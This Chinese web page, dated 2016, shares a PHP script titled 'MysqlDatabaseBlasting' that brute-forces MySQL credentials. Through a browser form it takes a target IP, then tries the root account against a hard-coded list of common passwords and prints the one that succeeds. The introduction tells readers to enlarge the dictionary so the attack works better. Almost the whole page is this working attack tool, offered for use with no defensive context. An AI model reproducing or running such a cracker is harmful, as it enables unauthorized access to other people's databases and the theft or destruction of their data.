PHP版Mysql爆破小脚本

Mysql PHP版本爆破小脚本

（注意：从代码可以看出用户名是个变量，一般数据库账号不会变，所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展，破解的成功与失败，就看你扩展的字典强大不强大了。用法：保存代码为MysqlDatabaseBlasting.php，浏览器打开就可使用。）

				?

									/*

									 *  author：Bearcat 2016-10-5

									 */

									<html>

									 <head>

									  <title>Mysql账号密码爆破工具</title>

									  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

									 </head>

									 <body>

									  <center>

									   <br><br>

									   <h1>MysqlDatabaseBlasting(Mysql账号密码在线爆破工具 V1.0)</h1>

									  <br>

									<?php

									 if(@$_POST['submit']){

									   $host = @$_POST['host'];

									   if($host!=""){

									    $username = "root";//用户名字典

									    $password = array('','123456','admin','root','ccf304vn'); //密码字典

									    echo "<hr><br>--------------------爆破状态--------------------<br>";

									    echo "密码错误次数：";

									    for ($i=0; $i <= count($password); $i++) {

									     if(@mysql_connect($host, $username, $password[$i])){

									       echo "<br><br><font color='red'>爆破成功--密码-->".@$password[$i]."</font>";

									       break;

									     }else{

									       echo $i."、";

									       continue;

									     }

									    }

									    echo "<br>--------------------爆破结束--------------------<br><hr>";

									   }else{

									    echo "<script>alert('黑客，输入数据库IP地址')</script>";

									   }

									 }

									?>

									<br><br><br><br>

									  <form action="MysqlDatabaseBlasting.php" method="post">

									   数据库IP地址:<input type="text" name="host"/>

									   <input type="submit" value="爆破" name="submit"/>

									  </form>

									<center>

									</body>

									 </html>

相关文章

热门资讯